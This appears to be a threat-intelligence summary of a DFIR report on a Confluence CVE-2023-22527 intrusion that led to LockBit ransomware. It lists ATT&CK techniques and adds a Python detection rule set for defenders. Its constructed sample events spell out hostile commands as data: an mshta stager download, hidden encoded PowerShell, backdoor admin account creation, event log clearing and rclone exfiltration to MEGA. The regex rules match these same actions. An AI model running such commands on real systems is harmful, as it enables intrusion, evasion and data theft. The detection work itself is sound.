Threat Actor:
LockBit ransomware group/affiliate or ShadowSyndicate ransomware group (based on IP address associations with AnyDesk C2 server)
Tactics, Techniques, and Procedures (TTPs):
Initial Access:
T1190 Exploit Public-Facing Application: Exploitation of CVE-2023-22527 (Confluence RCE vulnerability) on an exposed Windows Confluence server.
Execution:
T1218.005 Signed Binary Proxy Execution: Mshta: Used mshta.exe to download and execute a Metasploit stager.
T1059.001 Command and Scripting Interpreter: PowerShell: Used PowerShell for various tasks, including downloading AnyDesk, deobfuscating and executing shellcode, clearing event logs, and disabling Windows Defender.
Persistence:
T1543.003 Create or Modify System Process: Windows Service: Installed AnyDesk as a service for persistent remote access.
T1136.001 Create Account: Local Account: Created a new local account (“backup”) and added it to the Administrators group.
Privilege Escalation:
T1068 Exploitation for Privilege Escalation: The Confluence RCE (CVE-2023-22527) gave SYSTEM privileges from the outset; that access was then used to create a local administrator account.
Defense Evasion:
T1562.001 Impair Defenses: Disable or Modify Tools: Turned off Windows Defender via the GUI.
T1070.001 Indicator Removal on Host: Clear Windows Event Logs: Cleared Windows event logs on the file server.
Deleted files they brought into the environment.
Command and Control:
T1573.001 Encrypted Channel: Symmetric Cryptography: Metasploit communication was likely encrypted.
T1071.001 Application Layer Protocol: Web Protocols: Used HTTP for downloading the Metasploit stager.
T1219 Remote Access Software: Used AnyDesk for remote access and control.
Exfiltration:
T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage: Used Rclone to exfiltrate data to MEGA.io cloud storage.
Modus Operandi (MO):
Exploit Confluence vulnerability (CVE-2023-22527).
Deploy Metasploit stager and AnyDesk for persistent access.
Use Mimikatz and other tools to steal credentials.
Deploy LockBit ransomware using PDQ Deploy for automated distribution, and manual execution on critical servers.
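Added detection example (not code from the DFIR report): a small Python rule set that maps the TTPs above onto constructed process-creation records shaped like Sysmon Event ID 1 / Security 4688 fields. Hostnames, IPs, paths, passwords, the AnyDesk install switches and the rclone remote name are constructed assumptions, not values from the report.

```python
import re

# Constructed process-creation records (not real telemetry from the case).
SAMPLE_EVENTS = [
    {"host": "confluence01", "parent": "tomcat9.exe", "image": "mshta.exe",
     "cmd": "mshta.exe http://203.0.113.10:8080/stage"},
    {"host": "confluence01", "parent": "mshta.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc AAAA"},
    {"host": "confluence01", "parent": "cmd.exe", "image": "net.exe",
     "cmd": "net user backup P@ssw0rd /add"},
    {"host": "confluence01", "parent": "cmd.exe", "image": "net.exe",
     "cmd": "net localgroup Administrators backup /add"},
    {"host": "confluence01", "parent": "powershell.exe", "image": "AnyDesk.exe",
     "cmd": "AnyDesk.exe --install C:\\ProgramData\\AnyDesk --start-with-win --silent"},
    {"host": "fileserver01", "parent": "powershell.exe", "image": "wevtutil.exe",
     "cmd": "wevtutil.exe cl Security"},
    {"host": "fileserver01", "parent": "cmd.exe", "image": "rclone.exe",
     "cmd": "rclone.exe copy D:\\Shares\\Finance mega:exfil --transfers 8"},
    {"host": "fileserver01", "parent": "explorer.exe", "image": "notepad.exe",
     "cmd": "notepad.exe C:\\Users\\admin\\notes.txt"},
]

# Rule = (ATT&CK ID from the report, regex on image name, regex on command line).
# Both regexes must match for the rule to fire.
RULES = [
    ("T1218.005", r"(?i)^mshta\.exe$", r"(?i)https?://"),
    ("T1059.001", r"(?i)^powershell\.exe$",
     r"(?i)-(enc|encodedcommand)\b|Set-MpPreference|Clear-EventLog"),
    ("T1136.001", r"(?i)^net1?\.exe$",
     r"(?i)\b(user\s+\S+\s+\S+\s+/add|localgroup\s+administrators\s+\S+\s+/add)"),
    ("T1543.003", r"(?i)^anydesk\.exe$", r"(?i)--install"),
    ("T1070.001", r"(?i)^wevtutil\.exe$", r"(?i)\bcl\b"),
    ("T1567.002", r"(?i)^rclone\.exe$", r"(?i)\b(copy|sync|move)\b.*\bmega:"),
]


def match_event(event):
    """Return the ATT&CK IDs whose image and command-line patterns both match."""
    return [tid for tid, image_re, cmd_re in RULES
            if re.search(image_re, event["image"]) and re.search(cmd_re, event["cmd"])]


def detect(events):
    """Group hits per host, preserving event order, so the intrusion chain is visible."""
    findings = {}
    for ev in events:
        for tid in match_event(ev):
            findings.setdefault(ev["host"], []).append((tid, ev["cmd"]))
    return findings
```

Running detect(SAMPLE_EVENTS) yields the mshta/PowerShell/account-creation/AnyDesk chain on the Confluence host and log clearing plus rclone-to-MEGA on the file server, while the benign notepad record produces no hit.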
Report Credit:
https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/